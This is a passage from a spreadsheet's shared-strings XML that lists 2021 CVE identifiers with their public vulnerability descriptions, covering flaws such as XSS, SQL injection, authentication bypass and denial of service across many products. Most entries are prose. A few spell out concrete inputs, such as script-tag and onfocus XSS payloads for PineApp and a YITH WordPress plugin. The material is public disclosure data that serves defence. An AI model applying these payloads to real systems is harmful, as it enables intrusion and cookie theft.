  <si>
    <t>A ReDoS (regular expression denial of service) flaw was found in the Segment is-email package before 1.0.1 for Node.js. An attacker that is able to provide crafted input to the isEmail(input) function may cause an application to consume an excessive amount of CPU.</t>
  </si>
  <si>
    <t>CVE-2021-36717</t>
  </si>
  <si>
    <t>Synerion TimeNet version 9.21 contains a directory traversal vulnerability where, on the "Name" parameter, the attacker can return to the root directory and open the host file. This might give the attacker the ability to view restricted files, which could provide the attacker with more information required to further compromise the system.</t>
  </si>
  <si>
    <t>CVE-2021-36718</t>
  </si>
  <si>
    <t>SYNEL - eharmonynew / Synel Reports - The attacker can log in to the system with default credentials and export a report of eharmony system with sensetive data (Employee name, Employee ID number, Working hours etc') The vulnerabilety has been addressed and fixed on version 11. Default credentials , Security miscommunication , Sensetive data exposure vulnerability in Synel Reports of SYNEL eharmonynew, Synel Reports allows an attacker to log into the system with default credentials. This issue affects: SYNEL eharmonynew, Synel Reports 8.0.2 version 11 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36719</t>
  </si>
  <si>
    <t>PineApp - Mail Secure - The attacker must be logged in as a user to the Pineapp system. The attacker exploits the vulnerable nicUpload.php file to upload a malicious file,Thus taking over the server and running remote code.</t>
  </si>
  <si>
    <t>CVE-2021-3672</t>
  </si>
  <si>
    <t>A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36720</t>
  </si>
  <si>
    <t>PineApp - Mail Secure - Attacker sending a request to :/blocking.php?url=&lt;script&gt;alert(1)&lt;/script&gt; and stealing cookies .</t>
  </si>
  <si>
    <t>CVE-2021-36721</t>
  </si>
  <si>
    <t>Sysaid API User Enumeration - Attacker sending requests to specific api path without any authorization before 21.3.60 version could get users names from the LDAP server.</t>
  </si>
  <si>
    <t>CVE-2021-36722</t>
  </si>
  <si>
    <t>Emuse - eServices / eNvoice SQL injection can be used in various ways ranging from bypassing login authentication or dumping the whole database to full RCE on the affected endpoints. The SQLi caused by CWE-209: Generation of Error Message Containig Sensetive Information, showing parts of the aspx code and the webroot location , information an attacker can leverage to further compromise the host.</t>
  </si>
  <si>
    <t>CVE-2021-36723</t>
  </si>
  <si>
    <t>Emuse - eServices / eNvoice Exposure Of Private Personal Information due to lack of identification mechanisms and predictable IDs an attacker can scrape all the files on the service.</t>
  </si>
  <si>
    <t>CVE-2021-36724</t>
  </si>
  <si>
    <t>ForeScout - SecureConnector Local Service DoS - A low privilaged user which doesn't have permissions to shutdown the secure connector service writes a large amount of characters in the installationPath. This will cause the buffer to overflow and override the stack cookie causing the service to crash.</t>
  </si>
  <si>
    <t>CVE-2021-3673</t>
  </si>
  <si>
    <t>A vulnerability was found in Radare2 in version 5.3.1. Improper input validation when reading a crafted LE binary can lead to resource exhaustion and DoS.</t>
  </si>
  <si>
    <t>CVE-2021-36737</t>
  </si>
  <si>
    <t>The input fields of the Apache Pluto UrlTestPortlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the v3-demo-portlet.war artifact</t>
  </si>
  <si>
    <t>CVE-2021-36738</t>
  </si>
  <si>
    <t>The input fields in the JSP version of the Apache Pluto Applicant MVCBean CDI portlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the applicant-mvcbean-cdi-jsp-portlet.war artifact</t>
  </si>
  <si>
    <t>CVE-2021-36739</t>
  </si>
  <si>
    <t>The "first name" and "last name" fields of the Apache Pluto 3.1.0 MVCBean JSP portlet maven archetype are vulnerable to Cross-Site Scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>CVE-2021-36740</t>
  </si>
  <si>
    <t>Varnish Cache, with HTTP/2 enabled, allows request smuggling and VCL authorization bypass via a large Content-Length header for a POST request. This affects Varnish Enterprise 6.0.x before 6.0.8r3, and Varnish Cache 5.x and 6.x before 6.5.2, 6.6.x before 6.6.1, and 6.0 LTS before 6.0.8.</t>
  </si>
  <si>
    <t>CVE-2021-36741</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in Trend Micro Apex One, Apex One as a Service, OfficeScan XG, and Worry-Free Business Security 10.0 SP1 allows a remote attached to upload arbitrary files on affected installations. Please note: an attacker must first obtain the ability to logon to the product?s management console in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-36742</t>
  </si>
  <si>
    <t>A improper input validation vulnerability in Trend Micro Apex One, Apex One as a Service, OfficeScan XG and Worry-Free Business Security 10.0 SP1 allows a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-36744</t>
  </si>
  <si>
    <t>Trend Micro Security (Consumer) 2021 and 2020 are vulnerable to a directory junction vulnerability which could allow an attacker to exploit the system to escalate privileges and create a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36745</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro ServerProtect for Storage 6.0, ServerProtect for EMC Celerra 5.8, ServerProtect for Network Appliance Filers 5.8, and ServerProtect for Microsoft Windows / Novell Netware 5.8 could allow a remote attacker to bypass authentication on affected installations.</t>
  </si>
  <si>
    <t>CVE-2021-36746</t>
  </si>
  <si>
    <t>Blackboard Learn through 9.1 allows XSS by an authenticated user via the Assignment Instructions HTML editor.</t>
  </si>
  <si>
    <t>CVE-2021-36747</t>
  </si>
  <si>
    <t>Blackboard Learn through 9.1 allows XSS by an authenticated user via the Feedback to Learner form.</t>
  </si>
  <si>
    <t>CVE-2021-36748</t>
  </si>
  <si>
    <t>A SQL Injection issue in the list controller of the Prestahome Blog (aka ph_simpleblog) module before 1.7.8 for Prestashop allows a remote attacker to extract data from the database via the sb_category parameter.</t>
  </si>
  <si>
    <t>CVE-2021-36749</t>
  </si>
  <si>
    <t>In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.</t>
  </si>
  <si>
    <t>CVE-2021-3675</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in synaTEE.signed.dll of Synaptics Fingerprint Driver allows a local authorized attacker to overwrite a heap tag, with potential loss of confidentiality. This issue affects: Synaptics Synaptics Fingerprint Driver 5.1.xxx.26 versions prior to xxx=340 on x86/64; 5.2.xxxx.26 versions prior to xxxx=3541 on x86/64; 5.2.2xx.26 versions prior to xx=29 on x86/64; 5.2.3xx.26 versions prior to xx=25 on x86/64; 5.3.xxxx.26 versions prior to xxxx=3543 on x86/64; 5.5.xx.1058 versions prior to xx=44 on x86/64; 5.5.xx.1102 versions prior to xx=34 on x86/64; 5.5.xx.1116 versions prior to xx=14 on x86/64; 6.0.xx.1104 versions prior to xx=50 on x86/64; 6.0.xx.1108 versions prior to xx=31 on x86/64; 6.0.xx.1111 versions prior to xx=58 on x86/64.</t>
  </si>
  <si>
    <t>CVE-2021-36750</t>
  </si>
  <si>
    <t>ENC DataVault before 7.2 and VaultAPI v67 mishandle key derivation, making it easier for attackers to determine the passwords of all DataVault users (across USB drives sold under multiple brand names).</t>
  </si>
  <si>
    <t>CVE-2021-36751</t>
  </si>
  <si>
    <t>ENC DataVault 7.1.1W uses an inappropriate encryption algorithm, such that an attacker (who does not know the secret key) can make ciphertext modifications that are reflected in modified plaintext. There is no data integrity mechanism. (This behavior occurs across USB drives sold under multiple brand names.)</t>
  </si>
  <si>
    <t>CVE-2021-36753</t>
  </si>
  <si>
    <t>sharkdp BAT before 0.18.2 executes less.exe from the current working directory.</t>
  </si>
  <si>
    <t>CVE-2021-36754</t>
  </si>
  <si>
    <t>PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.</t>
  </si>
  <si>
    <t>CVE-2021-36755</t>
  </si>
  <si>
    <t>Nightscout Web Monitor (aka cgm-remote-monitor) 14.2.2 allows XSS via a crafted X-Forwarded-For header.</t>
  </si>
  <si>
    <t>CVE-2021-36756</t>
  </si>
  <si>
    <t>CFEngine Enterprise 3.15.0 through 3.15.4 has Missing SSL Certificate Validation.</t>
  </si>
  <si>
    <t>CVE-2021-36758</t>
  </si>
  <si>
    <t>1Password Connect server before 1.2 is missing validation checks, permitting users to create Secrets Automation access tokens that can be used to perform privilege escalation. Malicious users authorized to create Secrets Automation access tokens can create tokens that have access beyond what the user is authorized to access, but limited to the existing authorizations of the Secret Automation the token is created in.</t>
  </si>
  <si>
    <t>CVE-2021-36760</t>
  </si>
  <si>
    <t>In accountrecoveryendpoint/recoverpassword.do in WSO2 Identity Server 5.7.0, it is possible to perform a DOM-Based XSS attack affecting the callback parameter modifying the URL that precedes the callback parameter. Once the username or password reset procedure is completed, the JavaScript code will be executed. (recoverpassword.do also has an open redirect issue for a similar reason.)</t>
  </si>
  <si>
    <t>CVE-2021-36761</t>
  </si>
  <si>
    <t>The GeoAnalytics feature in Qlik Sense April 2020 patch 4 allows SSRF.</t>
  </si>
  <si>
    <t>CVE-2021-36762</t>
  </si>
  <si>
    <t>An issue was discovered in HCC Embedded InterNiche NicheStack through 4.3. The tfshnd():tftpsrv.c TFTP packet processing function doesn't ensure that a filename is adequately '\0' terminated; therefore, a subsequent call to strlen for the filename might read out of bounds of the protocol packet buffer (if no '\0' byte exists within a reasonable range).</t>
  </si>
  <si>
    <t>CVE-2021-36763</t>
  </si>
  <si>
    <t>In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties.</t>
  </si>
  <si>
    <t>CVE-2021-36764</t>
  </si>
  <si>
    <t>In CODESYS Gateway V3 before 3.5.17.10, there is a NULL Pointer Dereference. Crafted communication requests may cause a Null pointer dereference in the affected CODESYS products and may result in a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-36765</t>
  </si>
  <si>
    <t>In CODESYS EtherNetIP before 4.1.0.0, specific EtherNet/IP requests may cause a null pointer dereference in the downloaded vulnerable EtherNet/IP stack that is executed by the CODESYS Control runtime system.</t>
  </si>
  <si>
    <t>CVE-2021-36766</t>
  </si>
  <si>
    <t>Concrete5 through 8.5.5 deserializes Untrusted Data. The vulnerable code is located within the controllers/single_page/dashboard/system/environment/logging.php Logging::update_logging() method. User input passed through the logFile request parameter is not properly sanitized before being used in a call to the file_exists() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.</t>
  </si>
  <si>
    <t>CVE-2021-36767</t>
  </si>
  <si>
    <t>In Digi RealPort through 4.10.490, authentication relies on a challenge-response mechanism that gives access to the server password, making the protection ineffective. An attacker may send an unauthenticated request to the server. The server will reply with a weakly-hashed version of the server's access password. The attacker may then crack this hash offline in order to successfully login to the server.</t>
  </si>
  <si>
    <t>CVE-2021-36769</t>
  </si>
  <si>
    <t>A reordering issue exists in Telegram before 7.8.1 for Android, Telegram before 7.8.3 for iOS, and Telegram Desktop before 2.8.8. An attacker can cause the server to receive messages in a different order than they were sent a client.</t>
  </si>
  <si>
    <t>CVE-2021-3677</t>
  </si>
  <si>
    <t>A flaw was found in postgresql. A purpose-crafted query can read arbitrary bytes of server memory. In the default configuration, any authenticated database user can complete this attack at will. The attack does not require the ability to create objects. If server settings include max_worker_processes=0, the known versions of this attack are infeasible. However, undiscovered variants of the attack may be independent of that setting.</t>
  </si>
  <si>
    <t>CVE-2021-36770</t>
  </si>
  <si>
    <t>Encode.pm, as distributed in Perl through 5.34.0, allows local users to gain privileges via a Trojan horse Encode::ConfigLocal library (in the current working directory) that preempts dynamic module loading. Exploitation requires an unusual configuration, and certain 2021 versions of Encode.pm (3.05 through 3.11). This issue occurs because the || operator evaluates @INC in a scalar context, and thus @INC has only an integer value.</t>
  </si>
  <si>
    <t>CVE-2021-36771</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7110 allows reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36772</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7110 allows stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36773</t>
  </si>
  <si>
    <t>uBlock Origin before 1.36.2 and nMatrix before 4.4.9 support an arbitrary depth of parameter nesting for strict blocking, which allows crafted web sites to cause a denial of service (unbounded recursion that can trigger memory consumption and a loss of all blocking functionality).</t>
  </si>
  <si>
    <t>CVE-2021-36774</t>
  </si>
  <si>
    <t>Apache Kylin allows users to read data from other database systems using JDBC. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Kylin server processes. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36775</t>
  </si>
  <si>
    <t>a Improper Access Control vulnerability in SUSE Rancher allows users to keep privileges that should have been revoked. This issue affects: SUSE Rancher Rancher versions prior to 2.4.18; Rancher versions prior to 2.5.12; Rancher versions prior to 2.6.3.</t>
  </si>
  <si>
    <t>CVE-2021-36776</t>
  </si>
  <si>
    <t>A Improper Access Control vulnerability in SUSE Rancher allows remote attackers impersonate arbitrary users. This issue affects: SUSE Rancher Rancher versions prior to 2.5.10.</t>
  </si>
  <si>
    <t>CVE-2021-36777</t>
  </si>
  <si>
    <t>A Reliance on Untrusted Inputs in a Security Decision vulnerability in the login proxy of the openSUSE Build service allowed attackers to present users with a expected login form that then sends the clear text credentials to an attacker specified server. This issue affects: openSUSE Build service login-proxy-scripts versions prior to dc000cdfe9b9b715fb92195b1a57559362f689ef.</t>
  </si>
  <si>
    <t>CVE-2021-36778</t>
  </si>
  <si>
    <t>A Incorrect Authorization vulnerability in SUSE Rancher allows administrators of third-party repositories to gather credentials that are sent to their servers. This issue affects: SUSE Rancher Rancher versions prior to 2.5.12; Rancher versions prior to 2.6.3.</t>
  </si>
  <si>
    <t>CVE-2021-36779</t>
  </si>
  <si>
    <t>A Missing Authentication for Critical Function vulnerability in SUSE Longhorn allows any workload in the cluster to execute any binary present in the image on the host without authentication. This issue affects: SUSE Longhorn longhorn versions prior to 1.1.3; longhorn versions prior to 1.2.3.</t>
  </si>
  <si>
    <t>CVE-2021-3678</t>
  </si>
  <si>
    <t>showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)</t>
  </si>
  <si>
    <t>CVE-2021-36780</t>
  </si>
  <si>
    <t>A Missing Authentication for Critical Function vulnerability in longhorn of SUSE Longhorn allows attackers to connect to a longhorn-engine replica instance granting it the ability to read and write data to and from a replica that they should not have access to. This issue affects: SUSE Longhorn longhorn versions prior to 1.1.3; longhorn versions prior to 1.2.3v.</t>
  </si>
  <si>
    <t>CVE-2021-36781</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the parsec package of openSUSE Factory allows local attackers to imitate the service leading to DoS or clients talking to an imposter service. This issue affects: openSUSE Factory parsec versions prior to 0.8.1-1.1.</t>
  </si>
  <si>
    <t>CVE-2021-36782</t>
  </si>
  <si>
    <t>A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7.</t>
  </si>
  <si>
    <t>CVE-2021-36783</t>
  </si>
  <si>
    <t>A Insufficiently Protected Credentials vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners and Project Members to read credentials, passwords and API tokens that have been stored in cleartext and exposed via API endpoints. This issue affects: SUSE Rancher Rancher versions prior to 2.6.4; Rancher versions prior to 2.5.13.</t>
  </si>
  <si>
    <t>CVE-2021-36784</t>
  </si>
  <si>
    <t>A Improper Privilege Management vulnerability in SUSE Rancher allows users with the restricted-admin role to escalate to full admin. This issue affects: SUSE Rancher Rancher versions prior to 2.5.13; Rancher versions prior to 2.6.4.</t>
  </si>
  <si>
    <t>CVE-2021-36785</t>
  </si>
  <si>
    <t>The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36786</t>
  </si>
  <si>
    <t>The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows Sensitive Data Exposure of API credentials and private keys.</t>
  </si>
  <si>
    <t>CVE-2021-36787</t>
  </si>
  <si>
    <t>The femanager extension before 5.5.1 and 6.x before 6.3.1 for TYPO3 allows XSS via a crafted SVG document.</t>
  </si>
  <si>
    <t>CVE-2021-36788</t>
  </si>
  <si>
    <t>The yoast_seo (aka Yoast SEO) extension before 7.2.3 for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36789</t>
  </si>
  <si>
    <t>The dated_news (aka Dated News) extension through 5.1.1 for TYPO3 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2021-3679</t>
  </si>
  <si>
    <t>A lack of CPU resource in the Linux kernel tracing module functionality in versions prior to 5.14-rc3 was found in the way user uses trace ring buffer in a specific way. Only privileged local users (with CAP_SYS_ADMIN capability) could use this flaw to starve the resources causing denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36790</t>
  </si>
  <si>
    <t>The dated_news (aka Dated News) extension through 5.1.1 for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36791</t>
  </si>
  <si>
    <t>The dated_news (aka Dated News) extension through 5.1.1 for TYPO3 allows Information Disclosure of application registration data.</t>
  </si>
  <si>
    <t>CVE-2021-36792</t>
  </si>
  <si>
    <t>The dated_news (aka Dated News) extension through 5.1.1 for TYPO3 has incorrect Access Control for confirming various applications.</t>
  </si>
  <si>
    <t>CVE-2021-36793</t>
  </si>
  <si>
    <t>The routes (aka Extbase Yaml Routes) extension before 2.1.1 for TYPO3, when CsrfTokenViewHelper is used, allows Sensitive Information Disclosure because a session identifier is unsafely present in HTML output.</t>
  </si>
  <si>
    <t>CVE-2021-36794</t>
  </si>
  <si>
    <t>In Siren Investigate before 11.1.4, when enabling the cluster feature of the Siren Alert application, TLS verifications are disabled globally in the Siren Investigate main process.</t>
  </si>
  <si>
    <t>CVE-2021-36795</t>
  </si>
  <si>
    <t>A permission issue in the Cohesity Linux agent may allow privilege escalation in version 6.5.1b to 6.5.1d-hotfix10, 6.6.0a to 6.6.0b-hotfix1. An underprivileged linux user, if certain environment criteria are met, can gain additional privileges.</t>
  </si>
  <si>
    <t>CVE-2021-36797</t>
  </si>
  <si>
    <t>** DISPUTED ** In Victron Energy Venus OS through 2.72, root access is granted by default to anyone with physical access to the device. NOTE: the vendor disagrees with the reporter's opinion about an alleged "security best practices" violation.</t>
  </si>
  <si>
    <t>CVE-2021-36798</t>
  </si>
  <si>
    <t>A Denial-of-Service (DoS) vulnerability was discovered in Team Server in HelpSystems Cobalt Strike 4.2 and 4.3. It allows remote attackers to crash the C2 server thread and block beacons' communication with it.</t>
  </si>
  <si>
    <t>CVE-2021-36799</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-3680</t>
  </si>
  <si>
    <t>showdoc is vulnerable to Missing Cryptographic Step</t>
  </si>
  <si>
    <t>CVE-2021-36800</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from a code injection issue in the Money.php component of the application. A POST sent to /{company_id}/sales/invoices/{invoice_id} with an items[0][price] that includes a PHP callable function is executed directly. This issue was fixed in version 2.1.13 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-36801</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from an authentication bypass issue in the user-controllable field, companies[0]. This issue was fixed in version 2.1.13 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-36802</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from a denial-of-service issue that is triggered by setting a malformed 'locale' variable and sending it in an otherwise normal HTTP POST request. This issue was fixed in version 2.1.13 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-36803</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from a persistent (type II) cross-site scripting (XSS) vulnerability in processing user-supplied avatar images. This issue was fixed in version 2.1.13 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-36804</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from a password reset spoofing vulnerability, wherein an attacker can proxy password reset requests through a running Akaunting instance, if that attacker knows the target's e-mail address. This issue was fixed in version 2.1.13 of the product. Please note that this issue is ultimately caused by the defaults provided by the Laravel framework, specifically how proxy headers are handled with respect to multi-tenant implementations. In other words, while this is not technically a vulnerability in Laravel, this default configuration is very likely to lead to practically identical identical vulnerabilities in Laravel projects that implement multi-tenant applications.</t>
  </si>
  <si>
    <t>CVE-2021-36805</t>
  </si>
  <si>
    <t>Akaunting version 2.1.12 and earlier suffers from a persistent (type II) cross-site scripting (XSS) vulnerability in the sales invoice processing component of the application. This issue was fixed in version 2.1.13 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-36807</t>
  </si>
  <si>
    <t>An authenticated user could potentially execute code via an SQLi vulnerability in the user portal of SG UTM before version 9.708 MR8.</t>
  </si>
  <si>
    <t>CVE-2021-36808</t>
  </si>
  <si>
    <t>A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.</t>
  </si>
  <si>
    <t>CVE-2021-36809</t>
  </si>
  <si>
    <t>A local attacker can overwrite arbitrary files on the system with VPN client logs using administrator privileges, potentially resulting in a denial of service and data loss, in all versions of Sophos SSL VPN client.</t>
  </si>
  <si>
    <t>CVE-2021-3681</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Galaxy Collections. When collections are built manually, any files in the repository directory that are not explicitly excluded via the ``build_ignore`` list in "galaxy.yml" include files in the ``.tar.gz`` file. This contains sensitive info, such as the user's Ansible Galaxy API key and any secrets in ``ansible`` or ``ansible-playbook`` verbose output without the``no_log`` redaction. Currently, there is no way to deprecate a Collection Or delete a Collection Version. Once published, anyone who downloads or installs the collection can view the secrets.</t>
  </si>
  <si>
    <t>CVE-2021-3682</t>
  </si>
  <si>
    <t>A flaw was found in the USB redirector device emulation of QEMU in versions prior to 6.1.0-rc2. It occurs when dropping packets during a bulk transfer from a SPICE client due to the packet queue being full. A malicious SPICE client could use this flaw to make QEMU call free() with faked heap chunk metadata, resulting in a crash of QEMU or potential code execution with the privileges of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVE-2021-36823</t>
  </si>
  <si>
    <t>Authenticated Stored Cross-Site Scripting (XSS) vulnerability in WordPress Absolutely Glamorous Custom Admin plugin (versions &lt;= 6.8). Stored XSS possible via unsanitized input fields of the plugin settings, some of the payloads could make the frontend and the backend inaccessible.</t>
  </si>
  <si>
    <t>CVE-2021-36826</t>
  </si>
  <si>
    <t>Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager (WordPress plugin) versions &lt;= 2.4.13.</t>
  </si>
  <si>
    <t>CVE-2021-36827</t>
  </si>
  <si>
    <t>Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Saturday Drive's Ninja Forms Contact Form plugin &lt;= 3.6.9 at WordPress via "label".</t>
  </si>
  <si>
    <t>CVE-2021-36828</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) in WP Maintenance (WordPress plugin) &lt;= 6.0.4 affects multiple inputs.</t>
  </si>
  <si>
    <t>CVE-2021-36829</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop Launcher: Coming Soon &amp; Maintenance Mode plugin &lt;= 1.0.11 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-3683</t>
  </si>
  <si>
    <t>showdoc is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CVE-2021-36830</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Comment Guestbook plugin &lt;= 0.8.0 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36832</t>
  </si>
  <si>
    <t>WordPress Popups, Welcome Bar, Optins and Lead Generation Plugin – Icegram (versions &lt;= 2.0.2) vulnerable at "Headline" (&amp;message_data[16][headline]) input.</t>
  </si>
  <si>
    <t>CVE-2021-36833</t>
  </si>
  <si>
    <t>Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin &lt;= 4.8.6 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36839</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Social Media Follow Buttons Bar plugin &lt;= 4.73 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36841</t>
  </si>
  <si>
    <t>Authenticated Stored Cross-Site Scripting (XSS) vulnerability in YITH Maintenance Mode (WordPress plugin) versions &lt;= 1.3.7, vulnerable parameter &amp;yith_maintenance_newsletter_submit_label. Possible even when unfiltered HTML is disallowed by WordPress configuration.</t>
  </si>
  <si>
    <t>CVE-2021-36843</t>
  </si>
  <si>
    <t>Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Floating Social Media Icon plugin (versions &lt;= 4.3.5) Social Media Configuration form. Requires high role user like admin.</t>
  </si>
  <si>
    <t>CVE-2021-36844</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop WP Subscribe plugin &lt;= 1.2.12 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36845</t>
  </si>
  <si>
    <t>Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities in YITH Maintenance Mode (WordPress plugin) versions &lt;= 1.3.8, there are 46 vulnerable parameters that were missed by the vendor while patching the 1.3.7 version to 1.3.8. Vulnerable parameters: 1 - "Newsletter" tab, &amp;yith_maintenance_newsletter_submit_label parameter: payload should start with a single quote (') symbol to break the context, i.e.: NOTIFY ME' autofocus onfocus=alert(/Visse/);// v=' - this payload will be auto triggered while admin visits this page/tab. 2 - "General" tab issues, vulnerable parameters: &amp;yith_maintenance_message, &amp;yith_maintenance_custom_style, &amp;yith_maintenance_mascotte, &amp;yith_maintenance_title_font[size], &amp;yith_maintenance_title_font[family], &amp;yith_maintenance_title_font[color], &amp;yith_maintenance_paragraph_font[size], &amp;yith_maintenance_paragraph_font[family], &amp;yith_maintenance_paragraph_font[color], &amp;yith_maintenance_border_top. 3 - "Background" tab issues, vulnerable parameters: &amp;yith_maintenance_background_image, &amp;yith_maintenance_background_color. 4 - "Logo" tab issues, vulnerable parameters: &amp;yith_maintenance_logo_image, &amp;yith_maintenance_logo_tagline, &amp;yith_maintenance_logo_tagline_font[size], &amp;yith_maintenance_logo_tagline_font[family], &amp;yith_maintenance_logo_tagline_font[color]. 5 - "Newsletter" tab issues, vulnerable parameters: &amp;yith_maintenance_newsletter_email_font[size], &amp;yith_maintenance_newsletter_email_font[family], &amp;yith_maintenance_newsletter_email_font[color], &amp;yith_maintenance_newsletter_submit_font[size], &amp;yith_maintenance_newsletter_submit_font[family], &amp;yith_maintenance_newsletter_submit_font[color], &amp;yith_maintenance_newsletter_submit_background, &amp;yith_maintenance_newsletter_submit_background_hover, &amp;yith_maintenance_newsletter_title, &amp;yith_maintenance_newsletter_action, &amp;yith_maintenance_newsletter_email_label, &amp;yith_maintenance_newsletter_email_name, &amp;yith_maintenance_newsletter_submit_label, &amp;yith_maintenance_newsletter_hidden_fields. 6 - "Socials" tab issues, vulnerable parameters: &amp;yith_maintenance_socials_facebook, &amp;yith_maintenance_socials_twitter, &amp;yith_maintenance_socials_gplus, &amp;yith_maintenance_socials_youtube, &amp;yith_maintenance_socials_rss, &amp;yith_maintenance_socials_skype, &amp;yith_maintenance_socials_email, &amp;yith_maintenance_socials_behance, &amp;yith_maintenance_socials_dribble, &amp;yith_maintenance_socials_flickr, &amp;yith_maintenance_socials_instagram, &amp;yith_maintenance_socials_pinterest, &amp;yith_maintenance_socials_tumblr, &amp;yith_maintenance_socials_linkedin.</t>
  </si>
  <si>
    <t>CVE-2021-36846</t>
  </si>
  <si>
    <t>Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Premio Chaty (WordPress plugin) &lt;= 2.8.3</t>
  </si>
  <si>
    <t>CVE-2021-36847</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WebbaPlugins Webba Booking plugin &lt;= 4.2.21 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36848</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Social Media Feather (WordPress plugin) versions &lt;= 2.0.4</t>
  </si>
  <si>
    <t>CVE-2021-36849</t>
  </si>
  <si>
    <t>Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in René Hermenau's Social Media Share Buttons plugin &lt;= 3.8.1 at WordPress.</t>
  </si>
  <si>
